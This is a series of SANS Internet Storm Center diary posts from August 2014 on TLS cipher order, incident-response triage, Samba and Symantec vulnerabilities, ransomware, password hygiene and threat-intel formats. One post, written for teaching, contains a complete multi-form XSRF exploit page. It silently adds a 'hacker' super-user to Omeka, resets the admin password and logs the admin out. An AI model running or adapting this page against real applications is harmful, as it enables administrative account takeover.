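If you are wondering what such a fix looks like in practice: on Apache with mod_ssl, for example, the server-side preference is controlled by SSLHonorCipherOrder together with the order of the suites in SSLCipherSuite. The snippet below is only a minimal sketch with an example cipher string – tune the actual list to your environment and client base:

# enforce the server's cipher order instead of the client's
SSLHonorCipherOrder on
# list the PFS (DHE/ECDHE) suites first so they win whenever the client supports them
SSLCipherSuite ECDHE-RSA-AES128-SHA:DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:AES128-SHA:AES256-SHA:DES-CBC3-SHA
# and while you are at it, drop SSLv2 and SSLv3
SSLProtocol all -SSLv2 -SSLv3

Other servers have an equivalent knob (e.g. ssl_prefer_server_ciphers in nginx).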

So, if you want to use this script to test your servers, you can find it at https://github.com/bojanisc/nmap-scripts - please report any bugs to me.

Finally, I also submitted it to Nmap so hopefully it will get added into the official distribution. There is a bug that Daniel Miller noticed – in case a server supports more than 64 ciphers, and the server is running on Microsoft Windows, the script will fail to list the preferred ciphers.

The reason for this is that, when a client connects, Microsoft (the Schannel component, I presume) takes into account only the first 64 ciphers listed by the client. The other ciphers are ignored. This is the reason why the original ssl-enum-ciphers.nse Nmap script splits ciphers into chunks of 64. No idea why Microsoft did it this way (since the spec says that the client can include as many as it wants). However, it’s clearly a problem.

Now, I haven’t seen any web servers that support more than 64 ciphers in the wild – let me know if you find one. Additionally, according to this article: http://msdn.microsoft.com/en-us/library/windows/desktop/bb870930%28v=vs.85%29.aspx, the list of cipher suites on Windows is limited to 1023 characters.
Since most cipher names are 20+ characters, this could mean that you can't really have more than ~50 ciphers active on a Windows machine - I haven't tested this though.

 

--
Bojan
bojanz@twitter
INFIGO IS

10 Comments

Published: 2014-08-10

Incident Response with Triage-ir

In many cases having a full disk image is not an option during an incident. Imagine that you suspect you have dozens of infected or compromised systems. Can you spend 2-3 hours making a forensic copy of the hard disks of a hundred computers? In such situations, fast forensics is the solution. Instead of copying everything, collecting just the files that may contain evidence can solve this issue. In this diary I am going to talk about an application that will collect most of these files.

Triage-IR

Triage-ir is a script written by Michael Ahrendt. Triage-ir will collect system information, network information, registry hives, disk information, and it will dump memory. One of the powerful capabilities of triage-ir is collecting information from Volume Shadow Copies (v.851), which can defeat many anti-forensics techniques.

Triage-ir can be obtained from http://code.google.com/p/triage-ir/downloads/list. Triage-ir itself is just a script that depends on other tools such as the Sysinternals Suite[i], DumpIt[ii][iii], RegRipper[iv], md5deep[v], 7zip[vi] and some Windows built-in commands.

Here are the installation steps:

  1. Download Triage-ir
  2. Unzip it
  3. Download the dependencies
  4. Place the Sysinternals Suite and RegRipper in their own folders under the tools folder
  5. Place the other dependencies directly under the tools folder

During an incident you want to leave as small a footprint as possible, so I would suggest copying it to a USB drive. One issue here: if you are planning to dump the memory, the USB drive should be larger than the physical RAM.

Once you launch the application you can select which information you would like to collect. Each category is a separate tab.

Let's say that you would like to collect the Network Information only. All you have to do is click on the Network Information tab, click on Select None, select all the information you would like to collect, and then click Run.

Once the collection process is finished, triage-ir will prompt you that it is done.

All the collected information will be dumped into a new folder named with the date and the system name.


1 Comments

Published: 2014-08-09

Complete application ownage via Multi-POST XSRF

I enjoy performing penetration tests, and I also enjoy teaching how to do penetration testing correctly. Next up is SANS Sec560, Network Penetration Testing, in Albuquerque, NM. One of the points I make when teaching is to never consider vulnerabilities in isolation; using them in combination truly demonstrates the risk and impact. I was performing a web application penetration test, and the list of things it was vulnerable to was quite impressive:

The list of vulnerabilities:

  • Content can be framed
  • XSS
  • Method interchange
  • DoS, application hangs on long abnormal inputs, relies on client side validation
  • Able to upload files, including malicious content
  • Information leakage, internal server names, IP addresses, install locations...
  • XSRF
  • User enumeration via forgot password function
  • Administrators can disable their own account

We had determined that the primary threat would be for a user to escalate privileges and access information from other accounts. In order to achieve this goal we concentrated on the persistent XSS and XSRF. We would use the persistent XSS to launch the XSRF attack. We leveraged all of the vulnerabilities in one way or another, in other words, we were having a good time!

Using the XSS:

  • Create trouble ticket
  • Ticket will be first viewed by administrator
  • Script executes in the administrator browser
  • Administrator can perform all of the functions vulnerable to XSRF

A significant number of the functions were vulnerable to Cross Site Request Forgery (CSRF or XSRF), which is also known as session riding and transaction injection. The vulnerable functions had absolutely no anti-XSRF protection, and the interesting ones were all in the administrator part of the site. An attacker could add a new user, put the user in the administrator group, change the passwords, and log out. The problem was, each of these was a different transaction, and they had to be performed in the correct order to pull off the attack. The application owner and the development team did not appreciate the severity of the issue, and pointed out that their automated scanning tool had not identified the issue, therefore it didn't exist. Even if the issue did exist, it could only be of medium severity, because their tool said so. To top it all off, even if an attacker could pull off this mythical attack, it could not be done in one shot; the administrator had to click multiple times. In short, they did not appreciate the impact: the attacker would have complete control over the application. To make my point, a demonstration was in order, one that did the following:

  • Add a new user
  • Put the user in an administrator group
  • Lock out the super-user account
  • Log out the super-user account
  • Performed the functions in the correct order
  • Each function would wait for the previous one to complete
  • Was all in one HTML page
  • Would force the administrator to view a certain Rick Astley video :)
  • OK, we didn't do the last one, that would be WAY too mean.

My Google-fu was with me that day; I discovered a post by Tim Tomes (lanmaster53) that described exactly what I wanted to do. He also had sample code to start with:
http://www.lanmaster53.com/2013/07/multi-post-csrf/
The next problem was that, while I could obviously use their custom application for the proof of concept, I needed another application with similar vulnerabilities to demo for this post. Once again the Google-fu was with me:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5193.php
Omeka is a free and open source web publishing application. Also quick and easy to install. Also quick and easy to exploit. Last, but not least, I could download the vulnerable version 2.2 and be up and running in no time.

Administrator (victim) logs into the application:

The add user function as seen in an interception proxy (OWASP ZAP):

The code running:

Now the code. The important part is getting the script to run; I used a body onload. The script submits each one of the forms. The forms each contain one of the XSRF attacks. Each form loads in a different iframe. The first one runs, then the second one waits for the first iframe's onload to fire before it runs, and so on. The victim logs in, they check their queue, the XSS runs, the XSRF runs, they have lost control of the application, attacker wins.

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

Check out BSides Ottawa, our CfP is still open! Con is 5-6 September
http://www.bsidesottawa.ca/
I will be teaching SANS Sec560, Network Penetration Testing next in Albuquerque, NM !
http://www.sans.org/event/albuquerque-2014/course/network-penetration-testing-ethical-hacking

References:

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
http://cwe.mitre.org/data/definitions/352.html
http://www.lanmaster53.com/2013/07/multi-post-csrf/
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5193.php
http://omeka.org/
https://www.youtube.com/watch?v=dQw4w9WgXcQ

Code:

<html>
<head>
<title>XSRF Multi-post attack onload</title>
<!-- Creation Date: 31 July 2014 -->
<!-- Author: Adrien de Beaupre -->
<!-- Original code borrowed from Tim Tomes LaNMaSteR53 -->
<!-- Demonstrating multi-post XSRF-->
</head>

<body onload="runme();">
welcome to p0wned by XSRF!

<form name="xsrf0" action="http://intru-shun.ca/omeka/admin/users/add" method="POST" target="frame0">
<input type="hidden" name="username" value="hacker" />
<input type="hidden" name="name" value="evil" />
<input type="hidden" name="email" value="hacker@evil.com" />
<input type="hidden" name="role" value="super" />
<input type="hidden" name="active" value="1" />
</form>

<form name="xsrf1" action="http://intru-shun.ca/omeka/admin/users/change-password/1" method="POST" target="frame1">
<input type="hidden" name="new_password" value="Passw0rd" />
<input type="hidden" name="new_password_confirm" value="Passw0rd" />
</form>

<form name="xsrf2" action="http://intru-shun.ca/omeka/admin/users/logout" method="POST" target=frame2">
<input type="hidden" name="Logout" value="yes" />
</form>

<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<iframe name="frame2"></iframe>

<script>
function runme()
{
document.xsrf0.submit();
document.getElementsByTagName("iframe")[0].onload = function()
{
document.xsrf1.submit();
document.getElementsByTagName("iframe")[1].onload = function()
{
document.xsrf2.submit();
alert('All your base are belong to us')
}
}
}
</script>

</body>
</html>

1 Comments

Published: 2014-08-09

Microsoft & IE support plans, best be on IE11 by 01/2016

Microsoft announced in their blog on the 8th (thanks Allan for the heads up) that starting January 2016 the browsers that will be supported are: 

  • Vista SP2 - IE9
  • 2008 SP2 - IE9 
  • Windows 7 - IE11
  • 2008 R2 SP1 - IE11
  • Windows 8.1 - IE11
  • 2012 - IE10
  • 2012 R2 - IE11

​I can hear the security brain cells cheer and the business brain cells cringe.  From a security perspective running the latest browser typically makes sense.  However from a business perspective this may cause quite a few issues in many organisations.  Older applications were often written for specific browser versions, so to upgrade or allow for those to continue to function may not be a trivial task.  The blog does explain that you may be able to use "Enterprise mode" in IE11.  This might be one way to migrate for your organisation (http://blogs.msdn.com/b/ie/archive/2014/04/02/stay-up-to-date-with-enterprise-mode-for-internet-explorer-11.aspx)  

The blog entry also has what I'd like to call a few interesting throwaway lines.  For example "After January 12, 2016, only the most recent version of Internet Explorer available for a supported operating system will receive technical support and security updates." In other words you may have to migrate to IE12 when it becomes available for the OS you use.  

In short, if you are not using the latest Internet Explorer in your organisation, you may have limited time to get it sorted before your risk profile increases dramatically, unless of course all the bad guys promise to only concentrate on current versions of the browser. 

MS Blog can be found here --> http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx

Cheers

Mark H 

2 Comments

Published: 2014-08-08

Coming up next: Microsoft Patch Tuesday

Microsoft will publish 9 bulletins next Patch Tuesday: 7 important and 2 critical. More information at https://technet.microsoft.com/library/security/ms14-aug

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

0 Comments

Published: 2014-08-07

Checking for vulnerabilities in the Smart Grid System

SCADA systems are not composed the same way as regular IT systems. Therefore, the risk and vulnerability assessment cannot be performed as it is done for any other IT system. The most important differences are:

  • SCADA pentesting should not be done in the production environment: SCADA devices are very fragile, and activities that would be harmless in regular IT environments can be catastrophic to process availability. Think of massive blackouts or no water supply for a city.
  • SCADA devices have specific outputs for the industrial process they are controlling. The architecture and operating systems are not the same, so the risk assessment is not performed in the same way. For electrical systems, we need to address devices belonging to the Advanced Metering Infrastructure (AMI), Demand Response (DR), Distributed Energy Resources (DER), Distributed Grid Management (DGM), Electric Transportation (ET) and Wide Area Monitoring, Protection and Control (WAMPAC). This means we need to address devices like the following, instead of conventional network devices, services, laptops, desktop computers or mobile devices:
AMI: Meters, Relays, Aggregators, Access points
DR: Energy Resources, Digital Control Unit
DER: DER managed generation and storage devices, Customer Energy Management System
DGM: Automated Reclosure, Remote Fault Indicators, Capacitor Banks, Automated Switches, Load Monitor, Substation Breakers
WAMPAC: Phasor Measurement Units, Devices which include Phasor Measurement Unit capabilities, Field Deployed Phasor Data Concentrator, Field Deployed Phasor Gateways

Table 1: Devices in the Smartgrid Network

This means we need to consider a specific methodology for this type of infrastructure, one that leads to effective risk mitigation and proper detection of vulnerabilities in the smartgrid system. Today I want to recommend one, the Guide to Penetration Testing for Electric Utilities created by the National Electric Sector Cybersecurity Organization Resource (NESCOR). This methodology is composed of the following steps:

 

NESCOR Pentest Model

Source: http://www.smartgrid.epri.com/doc/NESCORGuidetoPenetrationTestingforElectricUtilities-v3-Final.pdf

Let's explain the steps a little bit:

  • Penetration Test Scoping: You need to decide which sector of the entire system will be the target of the assessment. It could be a substation, a generation plant or any other device listed in table 1. The scope could even be the entire system.
  • Architecture Review: You want to learn the context of the entire system. This is the first step of information acquisition. It can be done by checking the documentation of the system and analyzing the configuration of the devices that are part of the scope. You can also gather information in the same way as in conventional pentesting: Google, Shodan, Maltego and social networks.
  • Target System Setup: You don't want to perform a pentest in a live smartgrid production environment. Instead, you need to set up an environment with a configuration as close as possible to the live smartgrid production environment. That way we can get a full list of the vulnerabilities, performing even dangerous tests, without affecting the availability of the electrical service.
  • Server OS, Server application, Network Communication and Embedded device penetration tasks: These are the specific pentest tasks within the target systems, and several tools can be used for them.
  • End to end penetration testing analysis: You need to ensure that all possible inputs from external systems to all systems in the scope have been tested and evaluated as possible vulnerable points for attacks.
  • Result interpretation and reporting: As always, you need to develop a report including the vulnerabilities that could be exploited, the associated risks, the remediation steps and other recommendations that could be applied.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

0 Comments

Published: 2014-08-06

Free Service to Help CryptoLocker Victims by FireEye and Fox-IT

Various Internet Storm Center Handlers have written diaries on the malware called CryptoLocker, a nasty piece of malware which encrypts the files of the systems it infects, then gives victims 72 hours to pay the ransom to receive a private key that decrypts those files. There are still victims out there with encrypted files, and if you're one of them or know of someone affected, the folks at FireEye and Fox-IT have created a web portal, https://www.decryptcryptolocker.com/, to decrypt those files.

This is a free service for anyone afflicted by CryptoLocker, many of whom are small businesses without the resources to deal with this properly, so let people know.

Using the site is very straight forward (Steps taken from the FireEye blog[1]):

How to use the DecryptCryptoLocker tool

  1. Connect to https://www.decryptcryptolocker.com/
  2. Identify a single, CryptoLocker-encrypted file that you believe does not contain sensitive information.
  3. Upload the non-sensitive encrypted file to the DecryptCryptoLocker portal.
  4. Receive a private key from the portal and a link to download and install a decryption tool that can be run locally on your computer.
  5. Run the decryption tool locally on your computer, using the provided private key, to decrypt the encrypted files on your hard drive.

DecryptCryptoLocker is available globally and does not require users to register or provide contact information.

This is a fantastic resource from both FireEye and Fox-IT, so thanks to all involved in making this happen and making it free to use.

For more background on CryptoLocker from Fox-IT, read their CryptoLocker ransomware intelligence report [2].

 

[1] http://www.fireeye.com/blog/corporate/2014/08/your-locker-of-information-for-cryptolocker-decryption.html

[2] http://blog.fox-it.com/2014/08/06/cryptolocker-ransomware-intelligence-report/

Chris Mohan --- Internet Storm Center Handler on Duty

3 Comments

Published: 2014-08-06

Exploit Available for Symantec End Point Protection

An exploit is now available at exploit-db.com for the Symantec End Point Protection privilege escalation vulnerability. Symantec released a patch for this issue earlier this week [1].

The vulnerability requires normal user access to the affected system and can be used to escalate privileges to fully control the system (instead of being limited to a particular user), so this will make a great follow-up exploit to a standard drive-by exploit that gains user privileges.

We have gotten some reports that users have problems installing the patch on legacy systems (e.g. Windows 2003). Applying the patch just fails in these cases and appears to have no ill effect on system stability.

[1] http://www.symantec.com/business/support/index?page=content&id=TECH223338

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

5 Comments

Published: 2014-08-06

All Passwords have been lost: What's next?

Some of it may be hype. But no matter whether 500 million, 1.5 billion or even 3.5 billion passwords have been lost, as yesterday's report by Hold Security states, given all the password leaks we have had over the last couple of years it is pretty fair to assume that at least one of your passwords has been compromised at some point. [1]

Yes, we have talked about this many times, but sadly it doesn't seem to get old.

So what next? Passwords have certainly been shown to "not work" to authenticate users. But being cheap, they are still used by most websites (including this one, but we do offer a 2-factor option).

For web sites:

  • Review your password policies. There is no "right" policy, but come up with something that rejects obviously weak passwords and, on the other hand, allows users to choose passwords that they can remember (so they can have a unique password for your site).
  • Make sure your site works with commonly used password managers. The only real way for the user to have a unique password for each site is a password manager.
  • Lock accounts that haven't been used in a long time, and delete their password from your database, forcing a password reset if the user tries to reactivate the account.
  • Consider two-factor authentication, at least as an option and maybe mandatory for high value accounts (e.g. administrators). Google Authenticator is probably the easiest one to implement and it is free (see the quick sketch below). We have talked about other alternatives in the past as well.
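
To illustrate how little is involved: the six-digit codes Google Authenticator displays are just TOTP values derived from a shared base32 secret, and the server simply computes the same value (allowing a little clock skew) and compares. The one-liner below uses the stock oathtool utility with a throwaway example secret:

# generate the current TOTP code for a (throwaway, example) base32 secret
oathtool --totp -b "JBSWY3DPEHPK3PXP"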

For users:

  • Have a unique password for each site. As an alternative, you may have a single "throw away" password for sites that you don't consider important. But be aware that at some point a site that is not important now may become important as you do more business with it.
  • Use a password safe, if possible one that allows syncing locally without having to send your password collection to a cloud service.
  • For important sites that don't allow for two factor authentication, consider a "two-part password": One part will be kept in your password safe, while the second part you type in. The password safe part is unique to the site while the additional second part can be the same for different sites or at least easy to remember. This will give you some protection against a compromised password safe.
  • Change passwords once in a while (I personally like every 6 months...), in particular the "static" part of these high-value passwords.
  • Ask sites that you consider important to implement 2-factor authentication.

That's at least what I can come up with while sipping on my first cup of coffee for the day. 

[1] http://www.holdsecurity.com/news/cybervor-breach/

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

13 Comments

Published: 2014-08-05

Synolocker: Why OFFLINE Backups are important

One current threat causing a lot of sleepless nights for victims is "Cryptolocker"-like malware. Various variations of this type of malware are still haunting small businesses and home users by encrypting files and asking for ransom to obtain the decryption key. Your best defense against this type of malware is a good backup. Shadow volume copies may help, but aren't always available or complete.

In particular for small businesses, various simple NAS systems have become popular over recent years. Different manufacturers offer a set of Linux based devices that are essentially "plug and play" and offer high performance RAID protected storage that is easily shared on the network. One of these vendors, Synology, has recently been somewhat in the cross hairs of many attacks we have seen. In particular, vulnerabilities in the web-based admin interface of the device have led to numerous exploits we have discussed before.

The most recent manifestation of this is "Synolocker", malware that infects Synology disk storage devices and encrypts all files, similar to the original cryptolocker. Submissions to the Synology support forum describe some of the results [1].

The malware will also replace the admin console index web page with a ransom message, notifying the user of the exploit. It appears however that this is done before the encryption finishes. Some users were lucky enough to notice the message in time and were able to save some files from encryption.

It appears that the best way to deal with this malware, if found, is to immediately shut down the system and remove all drives. Then reinstall the latest firmware (which may require a sacrificial drive to be inserted into the system) before re-inserting the partially encrypted drives.

To protect your disk station from infection, your best bet is:

  • Do not expose it to the internet, in particular the web admin interface on port 5000
  • Use strong passwords for the admin functions
  • Keep your system up to date
  • Keep offline backups. This could be accomplished with a second disk station that is only turned on to receive the backups (see the sketch below); maybe best to have two disk stations from different manufacturers.
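
As a minimal sketch of such a pull-style offline backup, run from the second box after it is powered on and before it is shut down again (the host name, user and /volume1 share paths are assumptions based on a typical Synology layout, so adjust them to your own setup):

# pull the primary disk station's share onto the backup unit, then power the backup unit off again
rsync -av --delete backupuser@diskstation:/volume1/share/ /volume1/backup/share/

Because the backup box is offline outside the backup window, malware on the primary unit has no way to reach and encrypt these copies.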

It is important to note that while Synology has been hit the hardest with these exploits, devices from other manufacturers have had vulnerabilities as well, and the same security advice applies (but typically, they listen on ports other than 5000).

[1] http://forum.synology.com/enu/viewtopic.php?f=3&t=88716

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

4 Comments

Published: 2014-08-05

Legal Threat Spam: Sometimes it Gets Personal

Yesterday, I spotted the following tweet mentioning me:

Needless to say, I got intrigued, and luckily the sender of the tweet was willing to share a sample.

The sample turned out to be simple legal threat malware e-mail written in German. The e-mail claimed that the recipient downloaded a copyrighted movie and it asked for legal fees. The invoice for the legal fees was supposed to be included in the attached ".cab" file.

From: "Johannes Ullrich"  
To: [removed].de
Subject: [vorfall:132413123]

Guten Tag,

Am 01.08.2014 wurde von Ihrem Rechner mit der IP-Addresse 192.0.2.1 um 12:13:01 der Film "Need for Speed" geladen. Nach §19a UrhG ist dies eine kriminelle Handlung. Unsere Anwaltskanzlei  muss dies ans zuständige Amtsgericht melden, außer Sie Zahlen ein außergerichtliches Strafgeld in Höhe von 436.43 Euro an uns.
Die Rechnung "1234.cab" entnehmen Sie dem Anhang.

Hochachtungsvoll,
Johannes Ullrich
+4991312341234

(Rough translation: "On 01.08.2014 at 12:13:01, the movie "Need for Speed" was downloaded from your computer with the IP address 192.0.2.1. According to §19a UrhG this is a criminal act. Our law firm must report this to the competent local court unless you pay us an out-of-court penalty of 436.43 Euro. Please find the invoice "1234.cab" in the attachment. Respectfully, Johannes Ullrich")

The attached .cab file runs a typical trojan downloader that could download various pieces of malware. A quick search shows a number of other reports of this email, with different "From:" names. It looks like it picks plausible German names, maybe from the contact lists of infected systems. My name isn't that terribly unusual, so I don't think this is targeted at all. Sometimes it is just an odd coincidence, and they aren't really after you.

In the case above, the "From" e-mail address is not related to me. However, if an attacker sends spam using your e-mail address, it is very useful to have DMARC configured for your domain. With DMARC, you give the receiving mail server the option to report to you any e-mail that fails the DKIM or SPF tests. Only a few mail servers do so, but some of them are major public web mail systems. For example, here is a quick report I just received for a domain I own:


[screenshot of the DMARC report summary]

The attachment includes a report with details on why the e-mail was found to be suspect (of course, you should still be careful with attachments – these reports can be faked too!) ;-)
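
If you haven't set DMARC up for your own domain yet: the policy is just a DNS TXT record on the _dmarc label. A minimal example record (the domain and reporting address are placeholders; p=none means you only collect reports, without affecting delivery, until you are ready to move to quarantine or reject):

_dmarc.example.com.  IN  TXT  "v=DMARC1; p=none; rua=mailto:dmarc-reports@example.com"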

 

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

0 Comments

Published: 2014-08-04

Threats & Indicators: A Security Intelligence Lifecycle

In our recent three-part series, Keeping the RATs Out (Part 1, Part 2, Part 3), I tried to provide analysis offering you an end-to-end scenario wherein we utilized more than one tool to solve a problem. I believe this to be very useful particularly when making use of threat intelligence. Following is a partial excerpt from my toolsmith column, found monthly in the ISSA Journal, wherein I built on the theme set in the RATs series. I'm hopeful Threats & Indicators: A Security Intelligence Lifecycle helps you build or expand your threat intelligence practice.

I receive and review an endless stream of threat intelligence from a variety of sources. What gets tricky is recognizing what might be useful and relevant to your organizations and constituencies. To that end I’ll take one piece of recently received intel and work it through an entire lifecycle. This intel came in the form of an email advisory via the Cyber Intelligence Network (CIN) and needs to remain unattributed. The details, to be discussed below, included malicious email information, hyperlinks, redirects, URL shorteners, ZIP archives, malware, command and control server (C2) IPs and domain names, as well as additional destination IPs and malicious files. That’s a lot of information but sharing it in standards-based, uniform formats has never been easier. Herein is the crux of our focus for this month. We’ll use Mandiant’s IOCe to create an initial OpenIOC definition, Mitre’s OpenIOC to STIX, a Python utility to convert OpenIOC to STIX, STIXviz to visualize STIX results, and STIX to HTML, an XSLT stylesheet that transforms STIX XML documents into human-readable HTML. Sounds like a lot, but you’ll be pleasantly surprised how bang-bang the process really is. IOC represents Indicators Of Compromise (in case you just finally just turned off your vendor buzzword mute button) and STIX stands for Structured Threat Information eXpression. STIX, per Mitre, is a “collaborative community-driven effort to define and develop a standardized language to represent structured cyber threat information.” It’s well worth reading the STIX use cases. You may recall that Microsoft recently revealed the Interflow project which incorporates STIX, TAXII (Trusted Automated eXchange of Indicator Information), and CybOX (Cyber Observable eXpression standards) to provide “an automated machine-readable feed of threat and security information that can be shared across industries and community groups in near real-time.“ Interflow is still in private preview but STIX, OpenIOC, and all these tools are freely and immediately available to help you exchange threat intelligence...
 
Keep reading Threats & Indicators: A Security Intelligence Lifecycle here.

0 Comments

Published: 2014-08-02

All Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon

A remote code execution vulnerability in nmbd (the NetBIOS name services daemon) has been found in Samba versions 4.0.0 to 4.1.10 (assigned CVE-2014-3560), and a patch has been released by the team at samba.org.

Here are the details from http://www.samba.org/samba/security/CVE-2014-3560:

 
===========
Description
===========

All current versions of Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon.

A malicious browser can send packets that may overwrite the heap of the target nmbd NetBIOS name services daemon. It may be possible to use this to generate a remote code execution vulnerability as the superuser (root).
 
==================
Patch Availability
==================

A patch addressing this defect has been posted to

  http://www.samba.org/samba/security/

Additionally, Samba 4.1.11 and 4.0.21 have been issued as security releases to correct the defect. Patches against older Samba versions are available at http://samba.org/samba/patches/. Samba vendors and administrators running affected versions are advised to upgrade or apply the patch as soon as possible.

==========
Workaround
==========

Do not run nmbd, the NetBIOS name services daemon.
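
If you cannot apply the patch or upgrade right away, the workaround really is that simple: stop (and keep disabled) the nmbd service until you can. On a Debian/Ubuntu-style Samba install that might look like the following; the init system and exact service name vary by distribution, so treat these commands as assumptions to verify:

sudo service nmbd stop
# or, on systemd-based distributions:
sudo systemctl stop nmbd
sudo systemctl disable nmbd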

 

Chris Mohan --- Internet Storm Center Handler on Duty

1 Comments